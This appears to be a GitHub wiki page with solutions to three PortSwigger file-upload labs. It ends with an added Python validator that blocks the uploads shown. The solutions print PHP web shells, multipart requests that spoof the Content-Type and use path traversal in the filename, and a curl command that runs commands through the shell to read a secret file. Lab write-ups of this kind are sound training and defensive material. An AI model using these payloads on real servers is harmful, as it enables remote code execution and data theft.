File upload vulnerabilities - gachikuku/portswigger GitHub Wiki
Apprentice lab:
Remote code execution via web shell upload
This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in as wiener:peter.
- Upload a sample image (ideally 1px).
- Locate the file that has been uploaded (e.g. files/avatars/image.png).
- Analyse the POST request made and the GET request for the image.
- Change the POST request and see the change reflected in the GET request.
- Read the secret and submit it.
Apprentice lab:
Web shell upload via Content-Type restriction bypass
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in as wiener:peter.
- Upload a sample image (ideally 1px).
- Locate the file that has been uploaded (e.g. files/avatars/image.png).
- Analyse the POST request made and the GET request for the image.
- Duplicate the POST /my-account/avatar request.
- On the duplicated POST request, press ea to open and edit the request body.
- Edit the binary file (the - and + lines mark the change made to the avatar part):

```
-----------------------------110021003736074269862781810296
Content-Disposition: form-data; name="avatar"; filename="exploit.php"
- Content-Type: text/plain
+ Content-Type: image/png

<?php echo file_get_contents('/home/carlos/secret'); ?>
-----------------------------110021003736074269862781810296
Content-Disposition: form-data; name="user"

wiener
-----------------------------110021003736074269862781810296
Content-Disposition: form-data; name="csrf"

XdvzQpIziILt34TaP4GY1nLyFeFXhMhR
-----------------------------110021003736074269862781810296--
```

- Visit /files/avatars/exploit.php.
Practitioner lab:
Web shell upload via path traversal
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in as wiener:peter.
- Upload a sample image.
- Right-click the uploaded image to find out where it was uploaded: /files/avatars/image.png.
- Duplicate the POST request to upload a web shell: <?php system($_GET['cmd']); ?>
- Press ea to open and edit the request body (the - and + lines mark the change made to the filename):

```
-----------------------------33535606952856614791034043163
- Content-Disposition: form-data; name="avatar"; filename="image.php"
+ Content-Disposition: form-data; name="avatar"; filename="../image.php"
Content-Type: image/png

<?php system($_GET['cmd']); ?>
-----------------------------33535606952856614791034043163
Content-Disposition: form-data; name="user"

wiener
-----------------------------33535606952856614791034043163
Content-Disposition: form-data; name="csrf"

k6OY4oqfcG4TmjX5toKp6DmEgUiW8cBi
-----------------------------33535606952856614791034043163--
```

- Notice that the GET request for the uploaded image endpoint does not reflect the change.
- Trying stuff is encouraged: ..%2Fimage.php works!
- Verify we have a shell upload with curl "https://uuid.web-security-academy.net/files/avatars/../image.php?cmd=whoami"
- Exfiltrate the flag with cmd=cat%20/home/carlos/secret.
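The three labs above each fail on one server-side decision: storing whatever arrives, trusting the multipart Content-Type, and passing the multipart filename through to the filesystem. The check below, written here as an added example that is not part of this wiki or of the PortSwigger labs, derives the file type from the bytes and rejects names with path components, so every payload shown on this page is refused; the upload directory and the accepted image types (PNG, JPEG, GIF) are assumptions.

```python
import os
import posixpath
import re
from typing import NamedTuple, Optional
from urllib.parse import unquote

# Magic bytes of the image types the avatar endpoint is assumed to accept.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}


class Verdict(NamedTuple):
    accepted: bool
    reason: str
    destination: Optional[str]


def validate_upload(filename: str, client_content_type: str, data: bytes, upload_dir: str) -> Verdict:
    """Decide whether an avatar upload may be stored, and under which path.

    Both the multipart Content-Type and the filename are user-controlled, so neither is trusted:
    the type comes from the bytes and the stored name is built from the verified type.
    """
    # Canonicalise before checking: "..%2Fimage.php" only works when the server
    # decodes the name after (or instead of) validating it.
    filename = unquote(filename)
    # 1. Reject, rather than sanitise, any name carrying directory components.
    if "/" in filename or "\\" in filename or filename in ("", ".", ".."):
        return Verdict(False, "filename contains path components", None)
    # 2. Type from content, not from the client header (spoofed as image/png in the second lab).
    ext = next((e for magic, e in MAGIC.items() if data.startswith(magic)), None)
    if ext is None:
        return Verdict(False, f"not a recognised image (client claimed {client_content_type!r})", None)
    # 3. Allow-list the stem and attach the verified extension; "exploit.php" never lands on disk as .php.
    stem, _ = posixpath.splitext(filename)
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return Verdict(False, "unexpected characters in filename", None)
    root = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(root, stem + ext))
    # 4. Containment check on the resolved path, independent of the string checks above.
    if os.path.commonpath([root, dest]) != root:
        return Verdict(False, "resolved path escapes the upload directory", None)
    return Verdict(True, "ok", dest)
```

Serving the upload directory with script execution disabled remains a separate control; this check only decides what gets written and under which name.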